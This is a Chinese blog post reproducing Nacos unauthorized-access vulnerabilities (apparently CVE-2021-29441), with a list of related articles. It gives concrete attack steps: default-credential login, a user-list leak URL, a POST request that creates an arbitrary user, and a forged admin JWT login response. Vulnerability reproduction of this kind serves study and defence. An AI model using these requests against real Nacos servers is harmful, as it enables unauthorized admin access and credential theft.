Nacos未授权访问漏洞复现

已于 2023-07-13 14:51:05 修改
阅读量1.3k 收藏 1
点赞数 2
分类专栏: 漏洞复现 文章标签: 安全
于 2023-07-09 16:37:09 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/apple_52661176/article/details/131623950
版权

1 弱口令:nacos/nacos

http://ip:8848/nacos

 以上网址是默认登录页面地址,如图

 尝试用弱口令nacos/nacos登录。

2 账号及密码泄露

http://ip:8848/nacos/v1/auth/users?pageNo=1&pageSize=9

访问以上地址可以获取到已有的用户名和密码,如图

3 创建任意用户

POST http://ip:8848/nacos/v1/auth/users?username=test1&password=test1

抓包将GET改成POST提交,即可创建任意用户

 使用创建的test1/test1 用户成功登录

4 未授权访问

更改登录时的回包,即可直接管理员权限登录,回包内容如下:

HTTP/1.1 200
Date: Thu, 10 Nov 2022 01:27:16 GMT
Content-Type: application/json
Content-Length: 13
Connection: close
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Content-Security-Policy: script-src 'self'
Server: elb

{"accessToken":"eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTYxODEyMzY5N30.nyooAL4OMdiByXocu8kL1ooXd1IeKj6wQZwIH8nmcNA","tokenTtl":18000,"globalAdmin":true}

将此回包更改

更改成以下内容

nacos用户成功登录 

5 批量检测脚本

https://github.com/tonmonkey/TNacos

脚本来源:

基于Python3对Nacos相关漏洞的检测脚本编写 | Tommonkey

 

 

gnolnaituil
关注
专栏目录
web渗透测试漏洞复现nacos授权访问漏洞复现并getshell
HACKONE的博客
03-30 1092
nacos授权访问
nacos授权添加用户漏洞(CVE-2021-29441)
千寻的博客
11-04 1490
但是由于配置的过于简单,并且将协商好的`user-agent设置为Nacos-Server`,直接硬编码在了代码里,导致了漏洞的出现。 * 并且利用这个授权漏洞,攻击者可以`获取到用户名密码`等`敏感信息`。
JDK安装2023最完整教程与配置(零基础)
bdfcfff77fa的博客
06-19 1452
JDK安装2023最完整教程与配置(零基础)
Nacos漏洞总结复现_nacos默认jwt密钥导致授权访问
最新发布
VN520的博客
10-10 1241
Nacos中发现影响Nacos <= 2.1.0的问题,Nacos用户使用默认JWT密钥导致授权访问漏洞。通过该漏洞,攻击者可以绕过用户名密码认证,直接登录Nacos用户。
Nacos授权访问复现及修复
大数据姐姐
01-22 4198
Nacos授权访问修复,开启鉴权
Nacos授权访问漏洞(CVE-2021-29441)复现
一纸荒芜的博客
10-26 3124
Nacos授权访问漏洞复现
Nacos 授权访问漏洞复现
weixin_58609150的博客
07-08 725
POST http://IP:端口/nacos/v1/auth/users?漏洞地址:GET http://IP:端口/nacos/v1/auth/users?输入任意密码bp抓包修改返回包即可绕过进入后台。抓包将get方式修改为post并重放。
Alibaba Nacos授权访问漏洞复现
zyl404的博客
01-26 5137
Alibaba Nacos授权访问漏洞复现 漏洞概述 2020年12月29日,Nacos官方在github发布的issue中披露Alibaba Nacos 存在一个由于不当处理User-Agent导致的授权访问漏洞 。 通过该漏洞,攻击者可以进行任意操作,包括创建新用户并进行登录后操作。 影响版本 Nacos <= 2.0.0-ALPHA.1 环境搭建 下载地址 https://github.com/alibaba/nacos/releases/download/2.0.0-ALPHA.1/nac
Nacos身份绕过漏洞复现(QVD-2023-6271)
qq_42751192的博客
08-19 290
Nacos 是一个易于使用的平台,专为动态服务发现和配置以及服务管理而设计。可以帮助您轻松构建云原生应用程序和微服务平台。
Nacos权限认证绕过漏洞复现
时乙的博客
03-12 2650
2020年12月29日,Nacos官方在github发布的issue中披露Alibaba Nacos 存在一个由于不当处理User-Agent导致的授权访问漏洞 。通过该漏洞,攻击者可以进行任意操作,包括创建新用户并进行登录后操作。
漏洞复现Nacos 控制台默认口令漏洞
晚风不及你
04-28 763
Nacos控制台默认口令漏洞是一个重要的安全问题,它涉及到授权访问风险。在Nacos的某些版本中,如果使用了默认的口令或密钥,攻击者可能会利用这些默认设置来绕过身份认证,直接获得对Nacos访问权限。
Nacos漏洞修复】Nacos授权访问漏洞(CVE-2021-29441)
m0_52985087的博客
03-20 9771
但是由于配置的过于简单,并且将协商好的user-agent设置为Nacos-Server,直接硬编码在了代码里,导致了漏洞的出现。命令:curl -X GET 'http://localhost:8848/nacos/v1/auth/users?命令:curl -X GET 'http://localhost:8848/nacos/v1/auth/users?命令:curl -X GET 'http://localhost:8848/nacos/v1/console/server/state'
Nacos漏洞总结复现
heike_Ch的博客
04-23 1469
Nacos中发现影响Nacos <= 2.1.0的问题,Nacos用户使用默认JWT密钥导致授权访问漏洞。通过该漏洞,攻击者可以绕过用户名密码认证,直接登录Nacos用户。
【渗透实战】Nacos授权访问(CVE-2021-29441)
Nafia的博客
02-20 4674
Nacos授权访问漏洞挖掘记录
spring 微服务nacos授权访问漏洞修复
whandgdh的博客
06-17 7425
spring 微服务nacos授权访问漏洞修复
NACOS漏洞问题及修复(CVE-2021-29441)
热门推荐
Hoopy_Hoopy的博客
09-14 1万+
目录 1.漏洞相关问题 2.场景复现 2.1访问用户列表界面 2.2添加新用户 2.3再次查看用户列表 3.nacos升级 4.代码升级 1.漏洞相关问题 漏洞相关地址 CVE-2021-29441 - Nacos is a platform designed for dynamic service discovery and configuration and service management. - CVE-Searchhttps://cve.circl.lu/cve/CVE-20
漏洞复现Nacos系列多漏洞复现
失心少年
10-11 732
也就是nacos的密钥是有默认值的,其鉴权是JWT,我们知道密钥即可伪造一个恶意的JWT令牌来攻击,对于jwt加密 其实就是用了base64 密钥是写死在源码里面的 所以直接可以用jwt伪造攻击,对应就是数据包的accesstoken。在
nacos授权访问漏洞 修复
07-15
对于Nacos授权访问漏洞,建议你采取以下措施进行修复: 1. 更新到最新版本:确保你使用的Nacos版本是最新的,因为最新版本通常包含了安全修复和漏洞修复。 2. 配置访问控制:通过配置适当的访问控制策略,限制...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值